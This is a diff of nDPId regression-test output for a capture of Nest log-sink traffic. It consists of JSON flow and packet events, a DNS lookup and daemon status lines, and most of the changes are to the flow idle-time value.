-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536716409847,"flow_last_seen":1536716411997,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":1263,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536716411997,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63347,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":543,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":116,"flow_first_seen":1536714607530,"flow_last_seen":1536716407068,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":4069,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1536716532891,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63343,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":543,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1536716402828,"flow_last_seen":1536716406969,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":14853,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1536716532891,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63345,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":543,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1536716409847,"flow_last_seen":1536716412657,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":2259,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1536716532891,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63347,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":486,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536716407119,"flow_last_seen":1536716407119,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536716407119,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63346,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1536716407119,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536716407119,"pkt":"AJD7JidrGLQwJjRACABFAAAsMCAAAP8GYljAqPIPI65S7fdyK1cI7G5zAAAAAGACEgDD3QAAAgQEgAAA"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1536716407186,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536716407186,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAAC0GJHkjrlLtwKjyDytX93Kf6ho7COxudGASaQOxbwAAAgQFtA=="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1536716407188,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536716407188,"pkt":"AJD7JidrGLQwJjRACABFAAAoMCEAAP8GYlvAqPIPI65S7fdyK1cI7G50n+oaPFAQEgAgMAAAAAAAAAAA"} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":495,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536716407119,"flow_last_seen":1536716409280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536716409280,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63346,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":510,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536716409847,"flow_last_seen":1536716409847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536716409847,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63347,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1536716409847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536716409847,"pkt":"AJD7JidrGLQwJjRACABFAAAsMCwAAP8GGnHAqPIPI7yauvdzK1cI9889AAAAAGACEgAbLAAAAgQEgAAA"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":511,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1536716409908,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536716409908,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93M4S\/jECPfPPmASbvCMDgAAAgQFjA=="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":512,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1536716409910,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536716409910,"pkt":"AJD7JidrGLQwJjRACABFAAAoMC0AAP8GGnTAqPIPI7yauvdzK1cI988+OEv4xVAQEgAAlAAAAAAAAAAA"} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536716409847,"flow_last_seen":1536716411997,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":1263,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536716411997,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63347,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":543,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":116,"flow_first_seen":1536714607530,"flow_last_seen":1536716407068,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":4069,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1536716532891,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63343,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":543,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1536716402828,"flow_last_seen":1536716406969,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":14853,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1536716532891,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63345,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":543,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1536716409847,"flow_last_seen":1536716412657,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":2259,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1536716532891,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63347,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":547,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1536716402804,"flow_last_seen":1536716407116,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1536716592575,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00561{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":547,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":547,"packets-processed":424,"total-skipped-flows":0,"total-l4-data-len":43270,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":9,"total-detection-updates":2,"total-updates":0,"current-active-flows":1,"total-active-flows":9,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":64,"global_ts_msec":1536716652586} 00561{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":595,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":595,"packets-processed":452,"total-skipped-flows":0,"total-l4-data-len":43270,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":9,"total-detection-updates":2,"total-updates":0,"current-active-flows":1,"total-active-flows":9,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":65,"global_ts_msec":1536717254253} @@ -69,54 +69,54 @@ 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":612,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1536717427984,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1536717427984,"pkt":"AJD7JidrGLQwJjRACABFAABEMFAAAP8RJfbAqPIPwKjyAc5xADUAMGWoTp4BAAABAAAAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAQ=="} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":613,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1536717428084,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1536717428084,"pkt":"GLQwJjRAAJD7JidrCABFAABUzkdAAEARBu\/AqPIBwKjyDwA1znEAQGW0Tp6BgAABAAEAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAcAMAAEAAQAAAHgABCO8mro="} 00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":613,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1536717427961,"flow_last_seen":1536717428084,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1536717428084,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"35.188.154.186"}} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":614,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536717428089,"flow_last_seen":1536717428089,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536717428089,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63348,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":614,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1536717428089,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536717428089,"pkt":"AJD7JidrGLQwJjRACABFAAAsMFEAAP8GGkzAqPIPI7yauvd0K1cJA0ANAAAAAGACEgCqTwAAAgQEgAAA"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":615,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1536717428146,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536717428146,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93SD5IA7CQNADmASbvBIIgAAAgQFjA=="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":616,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1536717428152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536717428152,"pkt":"AJD7JidrGLQwJjRACABFAAAoMFIAAP8GGk\/AqPIPI7yauvd0K1cJA0AOg+SAPFAQEgC8pwAAAAAAAAAA"} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536717428089,"flow_last_seen":1536717430226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536717430226,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63348,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":674,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536717450091,"flow_last_seen":1536717450091,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536717450091,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63349,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":674,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1536717450091,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536717450091,"pkt":"AJD7JidrGLQwJjRACABFAAAsMG8AAP8GYgnAqPIPI65S7fd1K1cJDrE1AAAAAGACEgCA9gAAAgQEgAAA"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1536717450156,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536717450156,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAAC0GJHkjrlLtwKjyDytX93XProMNCQ6xNmASaQPV8QAAAgQFtA=="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":676,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1536717450159,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536717450159,"pkt":"AJD7JidrGLQwJjRACABFAAAoMHAAAP8GYgzAqPIPI65S7fd1K1cJDrE2z66DDlAQEgBEsgAAAAAAAAAA"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":681,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536717450091,"flow_last_seen":1536717452328,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536717452328,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63349,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":707,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":78,"flow_first_seen":1536716407119,"flow_last_seen":1536717449999,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":3908,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1536717572672,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63346,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":707,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1536717428089,"flow_last_seen":1536717431514,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":9343,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1536717572672,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63348,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":614,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536717428089,"flow_last_seen":1536717428089,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536717428089,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63348,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":614,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1536717428089,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536717428089,"pkt":"AJD7JidrGLQwJjRACABFAAAsMFEAAP8GGkzAqPIPI7yauvd0K1cJA0ANAAAAAGACEgCqTwAAAgQEgAAA"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":615,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1536717428146,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536717428146,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93SD5IA7CQNADmASbvBIIgAAAgQFjA=="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":616,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1536717428152,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536717428152,"pkt":"AJD7JidrGLQwJjRACABFAAAoMFIAAP8GGk\/AqPIPI7yauvd0K1cJA0AOg+SAPFAQEgC8pwAAAAAAAAAA"} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536717428089,"flow_last_seen":1536717430226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536717430226,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63348,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":674,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536717450091,"flow_last_seen":1536717450091,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536717450091,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63349,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":674,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1536717450091,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536717450091,"pkt":"AJD7JidrGLQwJjRACABFAAAsMG8AAP8GYgnAqPIPI65S7fd1K1cJDrE1AAAAAGACEgCA9gAAAgQEgAAA"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1536717450156,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536717450156,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAAC0GJHkjrlLtwKjyDytX93XProMNCQ6xNmASaQPV8QAAAgQFtA=="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":676,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1536717450159,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536717450159,"pkt":"AJD7JidrGLQwJjRACABFAAAoMHAAAP8GYgzAqPIPI65S7fd1K1cJDrE2z66DDlAQEgBEsgAAAAAAAAAA"} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":681,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536717450091,"flow_last_seen":1536717452328,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536717452328,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63349,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":707,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":78,"flow_first_seen":1536716407119,"flow_last_seen":1536717449999,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":3908,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1536717572672,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63346,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 